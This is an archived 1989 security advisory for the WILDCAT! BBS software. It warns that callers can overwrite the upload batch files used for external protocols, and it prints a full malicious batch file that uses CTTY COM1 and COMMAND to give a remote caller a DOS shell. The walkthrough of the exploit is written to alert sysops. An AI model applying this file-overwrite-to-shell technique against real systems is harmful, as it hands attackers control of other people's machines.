💾 Archived View for spam.works › mirrors › textfiles › bbs › security.txt captured on 2023-06-14 at 15:56:31.
-=-=-=-=-=-=-
WILDCAT!(tm) BBS system
Security Emergency
Documentation
January 2, 1989
Richard B. Johnson
PROGRAM EXCHANGE
(303) 440-0786
There exists within the WILDCAT!(tm) external protocol pro-
cedures the considerable possibility that somebody who is
familiar with the system could execute a copy of COMMAND.COM
and have full control of your computer, erasing or format-
ting disks, and creating all kinds of havoc. Basically, any-
thing that you could do from the keyboard can be done by the
remote-user if he knows how to do it.
Please read all the ".DOC" files in this archive and the
archives included within. I also suggest that you implement
LOG (LOG.ARC) if you haven't already done so. I was able to
detect an attempt at breaching security on my own system.
The only thing that prevented the hacker from getting to the
DOS level was he didn't know what the "upload" filename was
on my system. The LOG utility was what first called my
attention to this problem.
Note that I was able to log onto a system in Colorado as a
new user and, within 60 seconds I was at the 'DOS' level. It
had taken me only 20 seconds on my own system but I knew the
names of the "upload" batch files and the communications
adapter port being used.
The problem is that the external protocol setup, as advised
by Mustang Software, will allow an "upload" batch file to be
replaced by a batch file of the same name during an upload!
If your communications adapter port is COM1, and you use a
batch file called JUP.BAT for JMODEM uploads, the hacker
could upload the following JUP.BAT file:
REM * hacker's special
REM
REM
REM
REM
REM
REM
REM
IF %3 == HACKER.TXT GOTO BREAK
GOTO END
:BREAK
@ECHO OFF
CTTY COM1
COMMAND
:END
- 1 -
It works this way. The first "upload" is a file called
JUP.BAT. JMODEM (could be ZMODEM or any external protocol)
dutifully overwrites the existing JUP.BAT and exits with no
errors.
COMMAND.COM, when executing a ".BAT" file opens then closes
the file for each line in the file. COMMAND.COM "knows" that
the last line was, perhaps, line 4. It therefore looks at
line 5 for its next instruction. It executes one of the
several "REM" statements, then exits at the ":END" label
since the filename (%3) was not HACKER.TXT.
The BBS system software regains control and, finding no file
transferred, simply continues like nothing happened.
The hacker then attempts to upload HACKER.TXT using the
JMODEM protocol. JUP.BAT has been replaced with the hacker's
new version. Since the %3 parameter is now HACKER.TXT, the
batch file branches to label ":BREAK". The console input is
redirected to the COM1 port and an additional copy of
COMMAND.COM is loaded with its I/O having been redirected to
the COM1 port.
Of course the hacker has not executed any external protocols
on his system. He's just sitting there in terminal-mode in
full control of your system.
Caveat modulus carborundum.
- finis -
- 2 -